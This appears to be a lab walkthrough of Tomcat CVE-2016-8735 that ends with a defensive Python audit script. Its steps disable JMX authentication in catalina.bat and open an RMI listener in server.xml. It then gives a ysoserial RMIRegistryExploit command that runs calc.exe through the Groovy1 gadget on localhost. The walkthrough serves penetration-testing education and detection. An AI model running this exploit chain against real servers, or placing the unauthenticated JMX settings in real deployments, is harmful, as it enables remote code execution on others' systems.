xl7dev

Apache Tomcat Remote Code Execution (CVE-2016-8735)

0x01 Affected Platform

- Apache Tomcat 9.0.0.M1 to 9.0.0.M11
- Apache Tomcat 8.5.0 to 8.5.6
- Apache Tomcat 8.0.0.RC1 to 8.0.38
- Apache Tomcat 7.0.0 to 7.0.72
- Apache Tomcat 6.0.0 to 6.0.47
- Earlier, unsupported versions may also be affected

0x02 Test Platform

- Windows 2003 x86
- [POC](https://github.com/frohoff/ysoserial)
- [Apache Tomcat](http://archive.apache.org/dist/tomcat/tomcat-8/v8.0.36/bin/apache-tomcat-8.0.36-windows-x86.zip)
- [catalina-jmx-remote](http://archive.apache.org/dist/tomcat/tomcat-8/v8.0.36/bin/extras/catalina-jmx-remote.jar) (add to tomcat/lib/)
- [Groovy](https://repo1.maven.org/maven2/org/codehaus/groovy/groovy/2.3.9/groovy-2.3.9.jar) (add to tomcat/lib/)

0x03 Pentesting Steps

1. Add the JAVA_OPTS line below to tomcat/bin/catalina.bat, right after `@echo off` (the neighbouring lines are shown for context). It disables SSL and authentication for the JMX remote connector:

```bat
@echo off
set "JAVA_OPTS=-Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false"
rem Licensed to the Apache Software Foundation (ASF) under one or more
```

2. Add the JmxRemoteLifecycleListener line below to tomcat/conf/server.xml, after the existing Listener entries (shown for context). It exposes the RMI registry on port 10001 and the RMI server on port 10002:

```xml
<Listener className="org.apache.catalina.mbeans.GlobalResourcesLifecycleListener" />
<Listener className="org.apache.catalina.core.ThreadLocalLeakPreventionListener" />

<Listener className="org.apache.catalina.mbeans.JmxRemoteLifecycleListener" rmiRegistryPortPlatform="10001" rmiServerPortPlatform="10002" />

<!-- Global JNDI resources
Documentation at /docs/jndi-resources-howto.html
-->
```

3. Start Tomcat with tomcat/bin/startup.bat

4. Run ysoserial's RMIRegistryExploit against the RMI registry port:

```
C:\Documents and Settings\Administrator> java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit localhost 10001 Groovy1 "calc.exe"
```
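As an added defensive check (my own code, not part of the original post), this Python audit flags the conditions the walkthrough sets up: a Tomcat version inside the affected ranges from 0x01, a JmxRemoteLifecycleListener in server.xml, and JAVA_OPTS that turn off JMX authentication. The server.xml fragment and JAVA_OPTS string are constructed samples mirroring steps 1 and 2.

```python
import re
import xml.etree.ElementTree as ET
AFFECTED = [("9.0.0.M1", "9.0.0.M11"), ("8.5.0", "8.5.6"), ("8.0.0.RC1", "8.0.38"),
            ("7.0.0", "7.0.72"), ("6.0.0", "6.0.47")]  # ranges from section 0x01

# Constructed server.xml fragment mirroring the listener added in step 2.
SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Listener className="org.apache.catalina.mbeans.GlobalResourcesLifecycleListener" />
  <Listener className="org.apache.catalina.mbeans.JmxRemoteLifecycleListener" rmiRegistryPortPlatform="10001" rmiServerPortPlatform="10002" />
</Server>"""

# Constructed JAVA_OPTS matching the catalina.bat line in step 1.
JAVA_OPTS = ("-Dcom.sun.management.jmxremote.ssl=false "
             "-Dcom.sun.management.jmxremote.authenticate=false")

def version_key(v):
    # Map "major.minor.patch[.M<n>|.RC<n>]" to a sortable tuple; M < RC < GA release.
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:\.(M|RC)(\d+))?", v.strip())
    if not m: raise ValueError("unrecognised Tomcat version: %r" % v)
    stage = {"M": 0, "RC": 1, None: 2}[m.group(4)]
    return tuple(int(x) for x in m.group(1, 2, 3)) + (stage, int(m.group(5) or 0))

def is_affected_version(v):
    k = version_key(v)
    return any(version_key(lo) <= k <= version_key(hi) for lo, hi in AFFECTED)

def jmx_listener_ports(server_xml):
    # (registry, server) ports of JmxRemoteLifecycleListener, or None if not configured.
    for node in ET.fromstring(server_xml).iter("Listener"):
        if node.get("className", "").endswith(".JmxRemoteLifecycleListener"):
            return node.get("rmiRegistryPortPlatform"), node.get("rmiServerPortPlatform")
    return None

def jmx_unauthenticated(java_opts):
    # True when JAVA_OPTS explicitly disables JMX remote authentication.
    opts = dict(o[2:].split("=", 1) for o in java_opts.split() if o.startswith("-D") and "=" in o)
    return opts.get("com.sun.management.jmxremote.authenticate", "true").lower() == "false"

def audit(version, server_xml, java_opts):
    # An affected version with the listener enabled is the CVE-2016-8735 exposure.
    findings = []
    if is_affected_version(version):
        findings.append("Tomcat %s is within the CVE-2016-8735 affected ranges" % version)
    ports = jmx_listener_ports(server_xml)
    if ports:
        findings.append("JmxRemoteLifecycleListener listens on RMI ports %s/%s" % ports)
        if jmx_unauthenticated(java_opts):
            findings.append("jmxremote.authenticate=false: JMX exposed without credentials")
    return findings
```

Running `audit("8.0.36", SERVER_XML, JAVA_OPTS)` on the test platform above returns all three findings; a patched version with the listener removed returns an empty list.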

0x04 Reference

http://seclists.org/oss-sec/2016/q4/502